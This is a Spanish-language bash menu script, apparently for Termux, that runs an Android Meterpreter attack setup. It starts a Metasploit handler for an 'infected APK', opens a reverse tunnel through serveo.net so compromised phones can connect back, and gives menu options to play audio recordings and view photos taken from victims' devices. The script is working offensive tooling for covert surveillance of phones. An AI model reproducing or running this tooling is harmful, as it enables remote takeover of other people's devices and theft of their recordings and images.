#!/bin/bash
C='\033[1;36m'
G='\033[1;32m'
R='\033[1;31m'
Y='\033[1;33m'
B='\033[1;34m'
P='\033[1;35m'                                                        RE='\033[0m'
function reiniciar {
	echo $(clear)
	cd $HOME
	bash Bot-MSF-Serveo/bot
}
function banner {
	echo $(clear)
	bash $HOME/Bot-MSF-Serveo/txt
printf "$G BOT $Y LX $R v2.0.0 $W"
}
banner
echo
printf "$Y 3 OPCIONES PARA UTILIZAR (2) SESSIONES $C
1) $G ACTIVAR ANDROID METERPRETER HACKING WAITING...(1 SESSION) $C
2)$G  ACTIVAR SERVIDOR SERVEO PARA CONEXION (2 SESSION)... $C
3) $G MANUAL HACKING BASICO DE MESTASPLOIT.... $C
4) $G LLAMAR A FT PARA OPCIONES HACKING $C
5) $G ESCUCHAR AUDIOS GRABADOS $C
6) $G VER FOTOS TOMADAS $C
0)$R  Salir....$G
"
read -p " >>> " op
case $op in
	1)
		if [ -e ~/java/handler/*rc* ]; then
			echo
			printf "$G APK INFECTADO ENCONTRADO\n"
			echo
			sleep 5
		printf "$Y ADVERTENCIA!!! ESPERA QUE INICIE COMPLETO LUEGO USA LA OPCION 2 EN OTRA SESSION!!!\n$G"
		echo
		cd $HOME/java/handler && msfconsole -r *rc*
		reiniciar
	elif [ -e ~/$HOME/FastTools/.CONFIG/*rc* ]; then
		printf "$G ENCONTRADO EN FT \n"
		sleep 5
		msfconsole -r FastTools/.CONFIG/*rc*
		reiniciar
	else
		echo
		printf "$R NO ENCONTRADO NINGUN APK RC\n"
		echo
		printf "$G PRESIONA ENVIAR/ENTER\n"
		read
		reiniciar
		fi
		;;
	2)
		echo
		printf "$G ABRIENDO PUERTAS ESCUCHANTE DEL PAYLOAD\n"
		autossh -M 0 -R 25550:127.0.0.1:4546 serveo.net
		reiniciar
		;;
	3)
		bash $HOME/Bot-MSF-Serveo/manual
		echo
		printf " ENTER/ENVIAR PARA VOLVER\n"
		read
		reiniciar
		;;
	4)
		FT
		reiniciar
		;;
	5)
		printf "$R"
		echo
		cd $HOME/java/handler && ls *wav*
		echo
		printf "$G"
		read -p "COPIA Y PEGA EL AUDIO GRABADO PARA REPRODUCIR >> " o
		termux-open $o
		reiniciar
		;;
	6)
		printf "$R"
		echo
		cd $HOME/java/handler && ls *jpeg*
		echo
		printf "$G"
		read -p " COPIA Y PEGA EL NOMBRE DE LA IMAGEN QUE APARECE ARRIBA >> " h
		echo
		termux-open $h
		reiniciar
		;;
	0)
		exit
		;;

esac

